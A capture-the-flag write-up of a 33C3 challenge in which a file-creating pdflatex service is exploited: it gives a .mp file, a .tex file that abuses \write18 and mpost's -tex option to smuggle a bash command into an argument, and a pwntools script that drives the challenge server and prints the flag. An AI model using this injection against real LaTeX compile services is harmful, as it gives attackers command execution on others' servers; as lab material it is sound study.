Category: Misc
Points: 75
Just a tiny application, that lets the user write some files and compile them with pdflatex.
What can possibly go wrong?
nc 78.46.224.91 24242
So this is a service that allow us to create, show & compile some files.
create: Create a file. Valid file format are:.log,.tex,.mb,.sty&.bibshow: Show the file content.compile: Compile a file with thepdflatexcommand.
We started by googling the key word “pdflatex exploit”, then teammate mike found a useful link: Pwning coworkers thanks to LaTeX
Basically we just need to follow the method mentioned in the post:
- Create a
.mpfile - Create a
.texfile with the malicious content. Here we change the command to(cat${IFS}$(ls|grep${IFS}33C3))>qqq.log, which will later store the flag content intoqqq.log - Compile the
.texfile. This will causepdflatextexecute our command - Show the
qqq.logfile and get the flag
Here’s our final exploit:
sss.mp:
1
2
3
4
verbatimtex
\documentclass{minimal}\begin{document}
etex beginfig (1) label(btex blah etex, origin);
endfig; \end{document} bye
aaa.tex:
1
2
3
\documentclass{article}\begin{document}
\immediate\write18{mpost -ini "-tex=bash -c (cat${IFS}$(ls|grep${IFS}33C3))>qqq.log" "sss.mp"}
\end{document}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
from pwn import *
r = remote("78.46.224.91", 24242)
log.info("creating sss.mp...")
r.sendlineafter(">", "create mp sss")
r.recvline()
f = open("sss.mp", "r")
for line in f:
r.sendline(line.strip())
r.sendline("\q")
f.close()
log.info("creating aaa.tex...")
r.sendlineafter(">", "create tex aaa")
r.recvline()
f = open("aaa.tex", "r")
for line in f:
r.sendline(line.strip())
r.sendline("\q")
f.close()
r.sendlineafter(">", "compile aaa")
r.sendlineafter(">", "show log qqq")
r.interactive()
Don’t take LaTEX files from strangers!!
flag: 33C3_pdflatex_1s_t0t4lly_s3cur3!
Comments powered by Disqus.